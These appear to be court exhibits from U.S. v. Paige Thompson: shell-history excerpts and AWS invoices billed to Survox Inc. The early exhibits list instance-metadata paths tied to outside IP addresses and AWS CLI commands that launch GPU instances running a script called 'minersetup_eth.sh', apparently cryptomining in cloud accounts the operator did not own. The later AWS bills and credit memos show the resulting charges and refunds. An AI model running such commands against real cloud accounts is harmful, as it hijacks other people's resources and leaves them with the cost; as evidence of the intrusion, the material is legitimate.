../metadata_old/35.154.211.231.metadata.443:ami-id
../metadata_old/34.196.59.204.metadata.8888:ami-id
../metadata_old/18.225.10.207.metadata.80:ami-id
../metadata_old/18.204.247.252.metadata.443:ami-id
../metadata_old/63.34.213.125.metadata.443:ami-id
../metadata_old/34.239.93.133.metadata.443:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 810
Admitted__________________

aws.commands

```
7036  aws ec2 describe-instances --region ap-northeast-2
7037  aws ec2 describe-instances --region ap-northeast-1
```



aws.commands

1014



notes
opsworks?
ec2 read access and s3api read
guess whos back
apperian ec2 readonly / s3api limited

# EXHIBIT 811

```
402  aws --region us-west-2 --profile safesocial2 iot list-jobs

909  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
910  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80 --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
911  aws ec2 describe-subnets --region eu-west-1
912  aws ec2 describe-vpcs --region eu-west-1
913  aws ec2 create-default-vpc --region eu-west-1
914  aws ec2 describe-vpcs --region eu-west-2
915  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh

927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh --key-name default
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 811
Admitted__________________

# EXHIBIT 812

```
164  aws ec2 describe-instances --region us-east-1 describe-instances
165  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791 --key-name _
--associate-public-ip-address --security-group-ids sg-0d2c65751b2642544 --instance-initiated-shutdown-behavior terminate
166  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791 --key-name _
--associate-public-ip-address --security-group-ids sg-c719f0ae --instance-initiated-shutdown-behavior terminate
167  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 812
Admitted____________________

# EXHIBIT 901



Account number:
0924

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | 9485 |
| | Please include this invoice number with your payment |
| Invoice Date: | April 3 , 2019 |
| **TOTAL AMOUNT DUE ON May 3 , 2019** | **$53,454.01** |

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $53,454.01 |
| Charges | $53,454.91 |
| Credits | ($0.90) |
| Tax * | $0.00 |
| Total for this invoice | $53,454.01 |

| Detail for Consolidated Bill | |
|---|---|
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Storage Service | $12.92 |
| Charges | $12.92 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 901
Admitted____________________

| AWS Data Transfer | $54.48 |
|---|---|
| Charges | $54.48 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Glacier | $0.16 |
| Charges | $0.16 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Relational Database Service | $283.22 |
| Charges | $283.22 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Support (Business) | $3,508.63 |
| Charges | $3,508.63 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic Compute Cloud | $49,222.85 |
| Charges | $49,222.85 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon DynamoDB | $181.66 |
| Charges | $181.66 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| CT | $0.00 |
| Amazon Route 53 | $13.66 |
| Charges | $13.66 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Config | $5.51 |
| Charges | $5.51 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.90 |
| Credits | ($0.90) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Amazon Elastic File System | $2.80 |
| Charges | $2.80 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| | |
|---|---|
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Virtual Private Cloud** | **$90.00** |
| Charges | $90.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Kinesis** | **$78.12** |
| Charges | $78.12 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

## Please remit payment to Amazon Web Services:

Preferred method of payment is by Electronic Funds Transfer (EFT). Please ensure to reference the invoice number in the descriptive text field of your electronic funds transfer payment.

If you have any questions regarding payment for this invoice, please email aws-receivables-support@email.amazon.com

| Electronic funds transfer details: | or Mail payment to: |
| --- | --- |
| Bank Name: Wells Fargo NA<br>Account Name: Amazon Web Services, Inc.<br>Bank Address:<br>420 Montgomery Street<br>San Francisco CA 94163<br>Checking Account Number: 0227<br>ABA Routing Number: 0248<br>Wire Routing Number: 0248<br>SWIFT Code: WFBIUS6SXXX | Amazon Web Services, Inc.<br>PO BOX 84023<br>Seattle, WA 98124-8423, US |

All web services are sold by Amazon Web Services, Inc.

The above charges include charges incurred by your account as well as by all accounts you are responsible for through Consolidated Billing.

Thank you for using Amazon Web Services.

Sincerely,
**The Amazon Web Services Team**

This message was produced and distributed by Amazon Web Services, Inc., 410 Terry Avenue North, Seattle, Washington 98109-5210. AWS will not be bound by, and specifically objects to, any term, condition or other provision which is different from or in addition to the provisions of the AWS Customer Agreement or AWS Enterprise Agreement between AWS and you (whether or not it would materially alter such AWS Customer Agreement or AWS Enterprise Agreement) and which is submitted in any order, receipt, acceptance, confirmation, correspondence or otherwise, unless AWS specifically agrees to such provision in a written instrument signed by AWS.

Payer account number
0924

# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---|
| Survox Operations 0924) | $49,345.85 |
| Charges | $49,346.19 |
| Credits | ($0.33) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter 1047) | $3,965.02 |
| Charges | $3,965.37 |
| Credits | ($0.35) |
| Estimated US sales tax to be collected | $0.00 |
| Allen Porter 0039) | $143.18 |
| Charges | $143.40 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | $53,454.05 |

• There is a $0.04 difference between the sum of all linked account totals and your invoice total. This difference results from rounding of charges that are allocated from the Consolidated Billing account invoice to individual linked accounts.

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Survox Operations 0924) | $49,345.85 |
| Charges | $49,346.19 |
| Credits | ($0.33) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0924 total allocated for this invoice | $49,345.85 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $11.25 |
| Charges | $11.25 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $16.31 |
| Charges | $16.31 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Glacier | $0.16 |
| Charges | $0.16 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $92.85 |
| Charges | $92.85 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Support (Business) | $3,508.63 |
| Charges | $3,508.63 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $48.53 |
| Charges | $48.53 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $45,530.99 |
| Charges | $45,530.99 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
[redacted]0924

| Amazon Route 53 | $13.66 |
|---|---|
| Charges | $13.66 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $5.51 |
| Charges | $5.51 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.33 |
| Credits | ($0.33) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $2.80 |
| Charges | $2.80 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $37.05 |
| Charges | $37.05 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Kinesis | $78.12 |
| Charges | $78.12 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Allen Porter 1047) | $3,965.02 |
| Charges | $3,965.37 |
| Credits | ($0.35) |
| Estimated US sales tax to be collected | $0.00 |
| Account 1047 total allocated for this invoice | $3,965.02 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $1.66 |
| Charges | $1.66 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $38.06 |
| Charges | $38.06 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.35 |
| Credits | ($0.35) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $134.51 |
| Charges | $134.51 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $3,604.70 |
| Charges | $3,604.70 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $133.13 |
| Charges | $133.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $52.95 |
| Charges | $52.95 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

901-010

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Allen Porter 0039) | $143.18 |
| Charges | $143.40 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0039 total allocated for this invoice | $143.18 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.12 |
| Charges | $0.12 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.22 |
| Credits | ($0.22) |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $55.87 |
| Charges | $55.87 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $87.18 |
| Charges | $87.18 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 902



Account number:
███ 0924

## Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Invoice Summary

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

| | |
|---|---|
| Invoice Number: | ███ 4205 |
| Invoice Date: | April 25 , 2019 |
| Original Invoice Number: | ███ 9485 |
| **TOTAL AMOUNT** | **($40,042.64)** |

This credit memo was not applied to an invoice. You must take action to apply this credit memo to your account balance. Please deduct the amount of this credit memo from a future payment and send an email to aws-receivables-support@email.amazon.com with the remittance details of your payment.

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($40,042.64) |
| Charges | ($40,042.64) |
| Tax * | $0.00 |
| Total for this invoice | ($40,042.64) |

| Detail for Consolidated Bill | |
|---|---|
| Amazon Elastic Compute Cloud | ($40,042.64) |
| Charges | ($40,042.64) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($40,042.64) |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.

** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 902
Admitted_____

Payer account number

████████ 0924



# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
 https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---:|
| Survox Operations ████████ 0924) | ($40,042.64) |
| Charges | ($40,042.64) |
| Estimated US sales tax to be collected | $0.00 |
| **Total allocated for this invoice** | **($40,042.64)** |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

2

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Survox Operations 0924) | ($40,042.64) |
| Charges | ($40,042.64) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0924 total allocated for this invoice | ($40,042.64) |

| Detail for Linked Account | |
|---|---|
| Amazon Elastic Compute Cloud | ($40,042.64) |
| Charges | ($40,042.64) |
| Estimated US sales tax to be collected | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($40,042.64) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 903



Account number:
0924

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

# Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | 4401 |
| Invoice Date: | April 25 , 2019 |
| Original Invoice Number: | 9485 |
| **TOTAL AMOUNT** | **($2,269.83)** |

**This credit memo was not applied to an invoice. You must take action to apply this credit memo to your account balance. Please deduct the amount of this credit memo from a future payment and send an email to aws-receivables-support@email.amazon.com with the remittance details of your payment.**

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($2,269.83) |
| Charges | ($2,269.83) |
| Tax * | $0.00 |
| Total for this invoice | ($2,269.83) |

| Detail for Consolidated Bill | |
|---|---|
| AWS Support (Business) | ($2,269.83) |
| Charges | ($2,269.83) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($2,269.83) |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 903
Admitted___________________

Payer account number
0924

# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---|
| Survox Operations 0924) | ($2,269.83) |
| Charges | ($2,269.83) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | ($2,269.83) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
0924

| Summary for Linked Account | |
|---|---|
| Survox Operations 0924) | ($2,269.83) |
| Charges | ($2,269.83) |
| Estimated US sales tax to be collected | $0.00 |
| Account 0924 total allocated for this invoice | ($2,269.83) |

| Detail for Linked Account | |
|---|---|
| AWS Support (Business) | ($2,269.83) |
| Charges | ($2,269.83) |
| Estimated US sales tax to be collected | $0.00 |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($2,269.83) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 904



Account number:
[redacted]0924

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | [redacted]1717 |
| | Please include this invoice number with your payment |
| Invoice Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE ON June 2 , 2019** | **$2,119.69** |

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | $2,119.69 |
| Charges | $22,790.30 |
| Credits | ($20,670.61) |
| Tax * | $0.00 |
| Total for this invoice | $2,119.69 |

| Detail for Consolidated Bill | |
|---|---|
| Amazon Simple Storage Service | $14.85 |
| Charges | $14.85 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
